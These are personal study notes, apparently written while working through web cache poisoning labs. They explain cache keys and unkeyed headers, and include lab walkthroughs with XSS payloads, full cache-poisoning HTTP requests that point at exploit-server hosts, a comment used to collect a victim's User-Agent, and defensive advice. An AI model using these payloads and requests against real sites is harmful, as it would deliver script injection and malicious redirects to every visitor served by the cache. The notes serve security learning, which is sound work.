Web cache poisoning notes

Web cache poisoning

What is web cache poisoning?

"Web cache poisoning is an advanced technique." Nice, I finally get to learn an "advanced technique".

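The article also says that in web cache poisoning the attacker exploits the behavior of a server and its cache so that a harmful HTTP response is served to other users. Seen that way, the vulnerability targets the site's users rather than the server itself.

It has two phases:

The attacker gets the back-end server to produce a response that contains a payload.
Once that works, the attacker needs to get that response cached so that it is subsequently served to victims.

A poisoned web cache can be a way to distribute many different attacks, exploiting things like XSS, JavaScript injection, open redirection, and so on.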

Web cache poisoning research

It lists some related research:

Practical Web Cache Poisoning 2018
Web Cache Entanglement: Novel Pathways to Poisoning 2020

How does a web cache work?

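First we need to understand how web caches work.

If the server had to generate a fresh response for every single request, it would burn a lot of resources and the user experience would suffer. Caching is used to address this.

Wow, my computer organization course is coming back to bite me, though only a little.

The cache sits between the user and the server. It saves the response to a particular request, usually for a fixed amount of time. If another user sends an equivalent request within that time, the cache does not forward it to the server and simply returns a copy of the saved response itself. This reduces the load on the server.

This reminds me of a parameter I think I set when configuring Tencent Cloud, though I'm not sure it was this. Is this what Cloudflare does? Or is that proxy acceleration?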

Cache keys

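When the cache receives a request, it first has to decide whether it can answer it itself or has to forward it to the server. It makes that decision based on the cache key.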

Caches identify equivalent requests by comparing a predefined subset of the request’s components, known collectively as the “cache key”.

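Correspondingly, the parts of the request that are not in the cache key are said to be unkeyed.

If the keys match, the requests are treated as equivalent and the cache serves a copy of the cached response. Note the parts that get ignored here; they are studied further later on.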
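
To make the keyed/unkeyed distinction concrete for myself, here is a minimal toy cache in Python. It is only a sketch under stated assumptions: the key is assumed to be method + Host + path, there is no expiry, and the `ToyCache` class, the request dictionary shape, and the `backend` function are all hypothetical names of mine, not anything from a real cache product.

```python
from typing import Callable, Dict, Tuple

Request = Dict[str, str]  # hypothetical shape: "method", "host", "path", plus any headers


def cache_key(req: Request) -> Tuple[str, str, str]:
    # Assumed key: method + Host + path. Every other header is unkeyed.
    return (req["method"], req["host"], req["path"])


class ToyCache:
    def __init__(self, backend: Callable[[Request], str]) -> None:
        self.backend = backend
        self.store: Dict[Tuple[str, str, str], str] = {}

    def handle(self, req: Request) -> Tuple[str, str]:
        key = cache_key(req)
        if key in self.store:
            return ("hit", self.store[key])  # replay the stored copy
        body = self.backend(req)
        self.store[key] = body
        return ("miss", body)


def backend(req: Request) -> str:
    # Hypothetical back-end that trusts an unkeyed header when building a URL.
    host = req.get("x-forwarded-host", req["host"])
    return f'<script src="https://{host}/static/analytics.js"></script>'


cache = ToyCache(backend)
attacker = {"method": "GET", "host": "innocent-website.com", "path": "/",
            "x-forwarded-host": "evil-user.net"}
victim = {"method": "GET", "host": "innocent-website.com", "path": "/"}

first = cache.handle(attacker)  # miss: the back-end response is stored
second = cache.handle(victim)   # hit: same key, so the stored response is replayed
```

The victim's request has no special header, but because it maps to the same key it receives the response generated for the attacker's request.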

What is the impact of a web cache poisoning attack?

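How much damage it can do depends mainly on two factors:

What exactly the attacker can successfully get cached
It is pointed out again that web cache poisoning is more of a delivery mechanism (?) than a standalone attack, so the impact depends on how harmful the injected payload is.
The amount of traffic on the affected page
This one is easy to understand.

By the way, I was suffering from (suspected?) COVID while writing these notes. The vitamin C drink I have been taking somehow reminded me of the tofu pudding sold at the back gate of Yucai (maybe because it is sour like wayu?), and I was suddenly very homesick.

One thing worth noting: how long a cache entry lasts does not really limit the damage of web cache poisoning, because the attacker can script the attack to re-poison the cache indefinitely.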

Constructing a web cache poisoning attack

It gives the usual steps:

Identify and evaluate unkeyed inputs

Any web cache poisoning attack relies on manipulation of unkeyed inputs, such as headers.

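Thinking about it, of course it exploits unkeyed inputs. At first I assumed the attack worked by modifying keyed inputs. But if you change the cache key, the cache treats it as a different request, so the poisoned response would not be served to anyone else.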

Therefore, the first step when constructing a web cache poisoning attack is identifying unkeyed inputs that are supported by the server.

You can find them manually by adding random inputs to requests and watching whether the response changes. Burp Comparer can be used to compare the responses.
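
Outside Burp, the same comparison can be roughed out with Python's standard `difflib`. This is only a sketch of the idea: the two response bodies are made-up strings, and `response_diff` and `probe.example` are hypothetical names of mine.

```python
import difflib
from typing import List


def response_diff(baseline: str, probe: str) -> List[str]:
    """Return unified-diff lines between two response bodies."""
    return list(difflib.unified_diff(
        baseline.splitlines(), probe.splitlines(),
        fromfile="baseline", tofile="probe", lineterm="",
    ))


# Made-up bodies: the second one was requested with an extra header set to probe.example.
baseline = '<meta property="og:image" content="https://innocent-website.com/cms/social.png" />'
probe = '<meta property="og:image" content="https://probe.example/cms/social.png" />'

changed = response_diff(baseline, probe)       # non-empty: the input influenced the response
unchanged = response_diff(baseline, baseline)  # empty: the input had no visible effect
```

A non-empty diff only says the input affects the response; whether it is also unkeyed still has to be checked against the cache.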

Param Miner

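This introduces Param Miner, a Burp extension that identifies unkeyed inputs automatically.
The screenshot there shows Param Miner finding an unkeyed header, X-Forwarded-Host.

It also warns that while you are looking for unkeyed inputs, the responses you generate may end up being cached and served to real users (I guess the concern is that real users would notice?). So use a unique cache key in your requests so that your test responses are only ever served to you. Adding a cache buster (for example a unique parameter) to each request avoids the problem.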
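
A cache buster can be as simple as a random query parameter. The sketch below assumes the query string is part of the cache key on the target (which has to be verified per site); the parameter name `cb` and the helper `add_cache_buster` are my own hypothetical choices.

```python
import uuid
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def add_cache_buster(url: str, param: str = "cb") -> str:
    """Append a unique query parameter so the request gets its own cache key."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((param, uuid.uuid4().hex))
    return urlunsplit(parts._replace(query=urlencode(query)))


busted = add_cache_buster("https://innocent-website.com/en?region=uk")
```

Each call produces a different URL, so test responses are cached under keys that no real user will request.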

Elicit a harmful response from the back-end server

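After the previous step, the next thing is to find a way to generate a harmful response. Try to build it from the input you found: inputs that are reflected without being properly sanitized, or inputs that are used to dynamically generate other data, are both possible entry points.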

Get the response cached

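The response built in the previous step also has to end up in the cache. The description here is fairly general and did not feel very useful.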

Exploiting web cache poisoning vulnerabilities

Two different causes of web cache poisoning vulnerabilities are introduced here:

Flaws in the design of caches
Flaws in the implementation of caches

How to prevent web cache poisoning vulnerabilities

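Ha, the best defense is to not use caching at all. The article admits this advice may sound absurd, but in some cases, for example when you use a CDN and caching is simply switched on by default, it is worth asking whether you need caching at all.

The next option is to restrict caching to "purely static responses".

A more general point is also made: most sites today pull in third-party technology, both in development and in day-to-day operation. However good your own internal security is, once you bring in something third-party you depend heavily on its developers being security-aware too. Security is only as strong as its weakest link, so before adopting a third-party technology it is best to fully understand its security implications.

For web cache poisoning specifically, the question is not only whether to use caching at all, but also other things, such as which headers your CDN supports.
Many web cache poisoning vulnerabilities arise because attackers can manipulate obscure request headers. In many cases the website does not need these headers at all. Likewise, if you use a technology you do not fully understand and it supports such unkeyed inputs by default, you may be exposed. If a header is not needed, there is no reason to support or process it.

Some precautions can also be taken when implementing caching:

If you are thinking of excluding something from the cache key for performance reasons, rewrite the request instead.
Don't accept fat GET requests (GET requests with a body). Some third-party technologies may permit them by default.
Patch server-side vulnerabilities even if they look unexploitable, because the cache may make them exploitable.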

Exploiting cache design flaws

Using web cache poisoning to deliver an XSS attack

The simplest kind of web cache poisoning vulnerability: an unkeyed input is not handled properly and ends up reflected in the response.

Request and response:

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />

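X-Forwarded-Host is used to dynamically generate an Open Graph image URL (the og:image meta tag, which tells social media sites which preview image to show when the page is shared), and it is reflected in the response. This header is usually unkeyed, so in this example it can be used for poisoning.

Payload: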

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>" // note this!

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />
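
To see why the payload breaks out of the attribute, here is a small Python sketch of a back-end that pastes the header into the tag, next to a version that HTML-escapes it first. Both render functions are hypothetical stand-ins of mine, not the real site's code, and escaping is only one possible mitigation (not trusting the header at all is another).

```python
import html


def render_unsafe(forwarded_host: str) -> str:
    # Header value pasted straight into the attribute.
    return f'<meta property="og:image" content="https://{forwarded_host}/cms/social.png" />'


def render_escaped(forwarded_host: str) -> str:
    # Same template, but the value is HTML-escaped (quotes included) first.
    escaped = html.escape(forwarded_host, quote=True)
    return f'<meta property="og:image" content="https://{escaped}/cms/social.png" />'


payload = 'a."><script>alert(1)</script>"'
unsafe = render_unsafe(payload)   # the "> closes the attribute and tag, so the script is live
safe = render_escaped(payload)    # the payload stays inside the attribute as inert text
```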

Using web cache poisoning to exploit unsafe handling of resource imports

Some websites use unkeyed headers to dynamically generate URLs for importing resources, such as externally hosted JavaScript files.

GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0

HTTP/1.1 200 OK
<script src="https://evil-user.net/static/analytics.js"></script>

Lab: Web cache poisoning with an unkeyed header

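The hint says to use X-Forwarded-Host. Wow, then I looked and the GET request has no such header at all.

Per the solution, you add the X-Forwarded-Host header yourself and observe that its value is used in the response to dynamically generate "an absolute URL for importing a JavaScript file stored at /resources/js/tracking.js."
Then send the request again and observe the X-Cache header in the response, which shows that the response came from the cache. That is what makes the vulnerability exploitable.
The solution then says to go to the exploit server, change the file name to match the path in the response, /resources/js/tracking.js, and put the payload alert(document.cookie) in the body.

Then send the request to poison the cache:

X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net

When I did this before I did not take the cache buster seriously. It turns out it matters a lot.
Sorry, I was being dumb. First, I put the whole URL including https:// into X-Forwarded-Host, and for some reason the server then used the Referer header instead (I could not reproduce this afterwards). After fixing that, I found I had not trimmed the URL completely, so the path in the response became /resources/resources. How did I notice? I visited it. ┑(￣Д ￣)┍
After fixing these mistakes the lab was solved normally.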

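Besides the X-Forwarded-Host header above, cookies are also often used to dynamically generate content in the response. A common case is a cookie that indicates the user's language and is used to load the matching version of the page.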

GET /blog/post.php?mobile=1 HTTP/1.1
Host: innocent-website.com
User-Agent: Mozilla/5.0 Firefox/57.0
Cookie: language=pl;
Connection: close

When cookie-based cache poisoning vulnerabilities exist, they tend to be identified and resolved quickly because legitimate users have accidentally poisoned the cache.
With a request like the one above, if the Cookie header is unkeyed and Host is part of the cache key, every user sending an equivalent request will see the Polish page. Hence "legitimate users have accidentally poisoned the cache".

Here the request carries the following cookie:

Cookie: session=pd1RuEtKzuC1P5l9oLxesgBALNgUJ0qo; fehost=prod-cache-01

So I guess fehost is the way in?

I changed its value to test and found it reflected in the response:

<script>
            data = {"host":"0a57001b04c630cb8210615200530057.web-security-academy.net","path":"/","frontend":"test"}
        </script>

Oops, I forgot the cache buster again.
Per the solution, you close the double quote and add the XSS code: fehost=someString"-alert(1)-"someString
That solved it. This lab does not need the exploit server.
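
Why closing the double quote works is easier to see in a sketch. Below, `render_naive` is my guess at how the back-end builds the script block (string concatenation), and `render_encoded` shows one way it could be done more safely with `json.dumps`. Both functions and the `example.net` host are hypothetical.

```python
import json


def render_naive(fehost: str) -> str:
    # Assumed back-end behaviour: cookie value pasted into a JS string literal.
    return ('<script>data = {"host":"example.net","path":"/","frontend":"'
            + fehost + '"}</script>')


def render_encoded(fehost: str) -> str:
    # Let the JSON encoder escape quotes, then neutralise "<" so that
    # a "</script>" inside the value cannot close the script element.
    data = json.dumps({"host": "example.net", "path": "/", "frontend": fehost})
    return "<script>data = " + data.replace("<", "\\u003c") + "</script>"


payload = 'someString"-alert(1)-"someString'
naive = render_naive(payload)      # string is closed early, alert(1) becomes an expression
encoded = render_encoded(payload)  # quotes are backslash-escaped, payload stays a string
```

In the naive output the value reads "someString" minus alert(1) minus "someString", so the browser evaluates alert(1) while computing the expression.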

Using multiple headers to exploit web cache poisoning vulnerabilities

Everything above covers the simple case. Most of the time it will not be that simple.

GET /random HTTP/1.1
Host: innocent-site.com
X-Forwarded-Proto: http

HTTP/1.1 301 moved permanently
Location: https://innocent-site.com/random

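Note that this redirect only upgrades the request to HTTPS, which is harmless on its own. That does not mean there is no vulnerability: combined with a second header that controls the hostname in Location, the attacker can use this behavior to redirect victims to a malicious URL.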

Lab: Web cache poisoning with multiple headers

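The hint: This lab supports both the X-Forwarded-Host and X-Forwarded-Scheme headers.

~~After building a request, I found X-Forwarded-Host was reflected in the response~~ I got that wrong: I added a cache buster carelessly and messed things up.

So I read the solution.

This time the entry point is not the home page itself. In the HTTP history there is a request for /resources/js/tracking.js, and the response is: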

HTTP/2 200 OK
Content-Type: application/javascript; charset=utf-8
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 70

document.write('<img src="/resources/images/tracker.gif?page=post">');

Adding X-Forwarded-Host has no effect on the response. Removing it and adding X-Forwarded-Scheme (with a value other than https) instead produces a redirect with a Location header:

HTTP/2 302 Found
Location: https://0ac400ba04c7e511803c08db00530054.web-security-academy.net/resources/js/tracking.js
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 0

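As an aside, 302 is a redirection status. The HTTP status code classes are:

Informational responses (100 – 199)
Successful responses (200 – 299)
Redirection messages (300 – 399), which is where this 302 belongs
Client error responses (400 – 499)
Server error responses (500 – 599)

With both headers added, the Location header is built from the host supplied in X-Forwarded-Host:
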
HTTP/2 302 Found
Location: https://example.com/resources/js/tracking.js
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 0

Next, use the exploit server to turn this into a malicious redirect.

The final request:

GET /resources/js/tracking.js HTTP/2
Host: 0ac400ba04c7e511803c08db00530054.web-security-academy.net
Cookie: session=pvYcUhcbwf2XHf8KZ2kMx93xwoVifqRC
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://0ac400ba04c7e511803c08db00530054.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-Scheme: xiaxie
X-Forwarded-Host: exploit-0a0400f0040ee58d8078079b01ac006d.exploit-server.net
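
The behavior observed in this lab can be modelled with a few lines of Python. This is my own reconstruction from the three responses above, not the lab's real code; `redirect_location` and the hostnames `lab.example` and `exploit.example` are hypothetical.

```python
from typing import Dict, Optional


def redirect_location(headers: Dict[str, str], path: str) -> Optional[str]:
    """Return the Location of the 302, or None if no redirect is issued."""
    scheme = headers.get("x-forwarded-scheme")
    if scheme is None or scheme.lower() == "https":
        return None  # treated as already HTTPS, so X-Forwarded-Host is never used
    host = headers.get("x-forwarded-host", headers["host"])
    return f"https://{host}{path}"


path = "/resources/js/tracking.js"
only_host = redirect_location({"host": "lab.example", "x-forwarded-host": "exploit.example"}, path)
only_scheme = redirect_location({"host": "lab.example", "x-forwarded-scheme": "nothttps"}, path)
both = redirect_location({"host": "lab.example", "x-forwarded-scheme": "nothttps",
                          "x-forwarded-host": "exploit.example"}, path)
```

Neither header is dangerous alone in this model: the host header is only consulted once the scheme header has triggered the redirect, which is why both are needed.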

Exploiting responses that expose too much information

Cache-control directives

An important step in web cache poisoning is getting the crafted response cached. Sometimes the response itself reveals information the attacker needs to do so.

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

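As I understand it, this makes it easy for the attacker to script the attack and re-poison on a schedule, since Age and max-age together show when the current entry expires.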
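
For example, the time left before the cached entry expires can be worked out from those two headers. A minimal sketch, assuming the headers arrive as a plain dictionary with exactly these names; `seconds_until_expiry` is a hypothetical helper of mine.

```python
import re
from typing import Dict, Optional


def seconds_until_expiry(headers: Dict[str, str]) -> Optional[int]:
    """Seconds left for the cached entry, or None if no max-age is advertised."""
    match = re.search(r"max-age=(\d+)", headers.get("Cache-Control", ""))
    if match is None:
        return None
    age = int(headers.get("Age", "0"))
    return max(int(match.group(1)) - age, 0)


remaining = seconds_until_expiry({
    "Via": "1.1 varnish-v4",
    "Age": "174",
    "Cache-Control": "public, max-age=1800",
})  # 1800 - 174 = 1626
```

With the response above, the entry has 1626 seconds left, so that is when a re-poisoning request would need to be sent.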

Vary header

The rudimentary way the Vary header is often used can also help attackers (? I had never seen this header and did not see at first how it helps).

The Vary header specifies a list of additional headers that should be treated as part of the cache key even if they are normally unkeyed.

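Damn, that gives the whole game away. Vary is commonly used to declare that User-Agent is keyed, so that the mobile version of a page is not served to desktop users.

This information can be used to build multi-step attacks against a specific subset of users. For example, the attacker can poison the cache only for mobile users.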
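
A rough way to picture what Vary does to the key, as a Python sketch. It assumes a base key of Host + path and requests stored as dictionaries with lower-case header names; `cache_key_with_vary` and the sample User-Agent strings are hypothetical.

```python
from typing import Dict, Tuple


def cache_key_with_vary(req: Dict[str, str], vary: str) -> Tuple[str, ...]:
    """Base key (assumed: Host + path) extended by every header named in Vary."""
    base = (req["host"], req["path"])
    extra = tuple(req.get(name.strip().lower(), "")
                  for name in vary.split(",") if name.strip())
    return base + extra


mobile = {"host": "innocent-website.com", "path": "/", "user-agent": "MobileBrowser/1.0"}
desktop = {"host": "innocent-website.com", "path": "/", "user-agent": "DesktopBrowser/1.0"}

keyed_mobile = cache_key_with_vary(mobile, "User-Agent")
keyed_desktop = cache_key_with_vary(desktop, "User-Agent")
```

With `Vary: User-Agent` the two requests get different keys, so a response poisoned with the mobile User-Agent is only ever replayed to clients sending that exact value.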

Lab: Targeted web cache poisoning using an unknown header

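This lab is about attacking a specific group of users.

In the HTTP history there is again a GET request for /resources/js/tracking.js, and the response has a Vary header. I had no idea where to start, and the solution turned out to be fairly involved:

Use the Param Miner extension to guess headers. It finds X-Host, which serves as the input.
Setting a value in X-Host shows that it is used to dynamically generate "an absolute URL for importing the JavaScript file" at /resources/js/tracking.js, exactly like the first lab. Then build the payload the same way.
But this lab requires targeting specific users, so you also need to find out their User-Agent. Comments allow HTML tags, so you can post a comment that makes the victim's browser request your exploit server:
<img src="https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/foo" />
The exploit server's access log then shows the victim's User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

Use that value as the User-Agent of the malicious request, so that the malicious response is stored in the cache under the key the victims will hit.
The final request: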

GET / HTTP/1.1
Host: 0aaf00e703bdb2d280d53f140036001a.h1-web-security-academy.net
Cookie: session=uDUHGd9RjJ8iKMJd3awoAxfEZsSALBAf
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aaf00e703bdb2d280d53f140036001a.h1-web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Host: exploit-0ab500a70350b2e3804d3eba01100059.exploit-server.net
Connection: close

Using web cache poisoning to exploit DOM-based vulnerabilities

It is also noted that besides importing a JavaScript file as in the labs above, other malicious resources can be injected.

If a script handles data from the server in an unsafe way, this can potentially lead to all kinds of DOM-based vulnerabilities.

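For example, a JSON file containing a payload like {"someProperty" : "<svg onload=alert(1)>"}. If the website passes this value into a sink that supports dynamic code execution (a sink being a function or DOM property, such as innerHTML, that can cause harm when given attacker-controlled data), the payload executes in the context of the victim's browser session.

If you use web cache poisoning to make a website load malicious JSON data from your server, you may need to grant the website access to the JSON using CORS. I have completely forgotten the CORS part, and to be honest I never really understood it.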

DOM-based vulnerabilities

Lab: Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria

This lab involves DOM vulnerabilities, which I don't know well.

Chaining web cache poisoning vulnerabilities

Several attack techniques are combined, with web cache poisoning serving only as the delivery mechanism.

Lab: Combining web cache poisoning vulnerabilities

This lab is even more complex. I'll come back to it later.

Exploiting cache implementation flaws

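The techniques above that exploit unkeyed inputs are effective, but they only scratch the surface of web cache poisoning.

This part covers "exploiting quirks in specific implementations of caching systems", which exposes a much larger attack surface. It introduces some "new" techniques from the talk their Director of Research gave at Black Hat in 2020.

New enough for me.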

Cache key flaws

Generally speaking, websites take most of their input from the URL path and the query string.

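I strongly agree, limited as my knowledge and experience are.

But because the request line is usually part of the cache key, these inputs have traditionally been considered unsuitable for cache poisoning: a payload injected there acts as a cache buster, so the poisoned entry is never served to any victim.

Going further, the logic of a particular caching system may not be what you expect. In practice many websites and CDNs apply various transformations to keyed components when they are saved in the cache key, for example:

Excluding the query string
Filtering out specific query parameters
Normalizing input in keyed components

These transformations can have unexpected results: although both derive from the same input, the data written into the cache key can differ from the data that is finally passed to the application code.

In the case of fully integrated, application-level caches, these discrepancies can be even more extreme.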
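
The gap between "what the cache keys on" and "what the application sees" can be sketched in Python. Everything here is an assumption for illustration: a cache that lower-cases the host and drops one query parameter (`utm_content`, picked arbitrarily) from the key, and a back-end that reads every parameter.

```python
from typing import Dict
from urllib.parse import parse_qsl, urlencode, urlsplit

EXCLUDED_PARAMS = {"utm_content"}  # hypothetical parameter the cache ignores


def cache_key(host: str, target: str) -> str:
    """Key after the assumed transformations: host lower-cased, excluded params dropped."""
    parts = urlsplit(target)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k not in EXCLUDED_PARAMS]
    return f"{host.lower()}{parts.path}?{urlencode(kept)}"


def backend_sees(target: str) -> Dict[str, str]:
    """The application still receives every query parameter, decoded."""
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))


clean = "/?lang=en"
poisoned = "/?lang=en&utm_content=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"

same_key = cache_key("Example.com", clean) == cache_key("example.com", poisoned)
seen = backend_sees(poisoned)["utm_content"]
```

Both requests collapse to the same key, yet the back-end receives the payload from the second one, so a keyed component ends up behaving like an unkeyed input.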

Cache probing methodology

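Finding cache implementation flaws works a little differently from classic web cache poisoning. It depends heavily on the specific cache implementation and configuration, which "vary from site to site" (I like this phrase).

At a high level there are three steps:

Identify a suitable cache oracle (I did not understand what this oracle is at first; see [[#Identify a suitable cache oracle]])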
Probe key handling
Identify an exploitable gadget

Identify a suitable cache oracle

A cache oracle is simply a page or endpoint that provides feedback about the cache’s behavior.

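To be usable, a cache oracle must be cacheable and must indicate in some way whether a response came from the server or from the cache. This feedback can take several forms:

An HTTP header that explicitly tells you whether you got a cache hit
Observable changes to dynamic content
Distinct response times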
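
The first kind of feedback is the easiest to automate. Here is a heuristic sketch in Python that only looks at X-Cache, Cache-Status, and Age; real caches use many other headers, so the header list and the `classify` helper are my assumptions, not a complete detector.

```python
from typing import Dict


def classify(headers: Dict[str, str]) -> str:
    """Guess 'hit', 'miss', or 'unknown' from common cache feedback headers."""
    lowered = {k.lower(): v.lower() for k, v in headers.items()}
    for name in ("x-cache", "cache-status"):
        value = lowered.get(name, "")
        if "hit" in value:
            return "hit"
        if "miss" in value:
            return "miss"
    age = lowered.get("age", "")
    if age.isdigit() and int(age) > 0:
        return "hit"  # a positive Age means the response has been sitting in a cache
    return "unknown"


from_server = classify({"X-Cache": "miss", "Age": "0"})
from_cache = classify({"Cache-Status": "hit"})
```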

Ideally, the cache oracle will also reflect the entire URL and at least one query parameter in the response.
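This makes it easy to compare what comes back from the cache against what comes back from the server.

If you can identify which specific cache product is in use, you can read its documentation to learn how the default cache key is built. It may also contain useful tips, for example: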

Akamai-based websites may support the header Pragma: akamai-x-get-cache-key, which you can use to display the cache key in the response headers

Probe key handling

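This section is mainly about working out how the key is processed, in order to widen the attack surface. In particular, look for transformations: compare the keys produced by different inputs, for example by sending two similar requests and comparing the responses.

Take the following example. Assume the cache oracle is the home page, which uses the Host header to dynamically generate the Location header: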

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com/en
Cache-Status: miss

To test whether the port is excluded from the cache key, first send a request with an arbitrary port:

GET / HTTP/1.1
Host: vulnerable-website.com:1337

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com:1337/en
Cache-Status: miss

Then send another one without the port:

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com:1337/en
Cache-Status: hit

This shows that the port really is excluded from the cache key.

Although Host is keyed, the way it is transformed still lets us inject a payload.
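
The three request/response pairs above can be reproduced with a tiny Python model. It assumes, as the example suggests, that the cache drops the port when building the key while the back-end reflects the full Host header; `cache_key`, `backend_location`, and `fetch` are hypothetical names, and IPv6 hosts are ignored.

```python
from typing import Dict, Tuple


def cache_key(host_header: str, path: str) -> Tuple[str, str]:
    hostname = host_header.split(":", 1)[0]  # assumed transformation: port dropped
    return (hostname, path)


def backend_location(host_header: str) -> str:
    return f"https://{host_header}/en"  # back-end reflects the full Host header


store: Dict[Tuple[str, str], str] = {}


def fetch(host_header: str, path: str = "/") -> Tuple[str, str]:
    key = cache_key(host_header, path)
    if key in store:
        return ("hit", store[key])
    store[key] = backend_location(host_header)
    return ("miss", store[key])


with_port = fetch("vulnerable-website.com:1337")  # miss, Location contains :1337
without_port = fetch("vulnerable-website.com")    # hit, still served the :1337 Location
```

The second request never reaches the back-end, which matches the `Cache-Status: hit` with the stale `:1337` in Location.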

I read this section in a complete fog.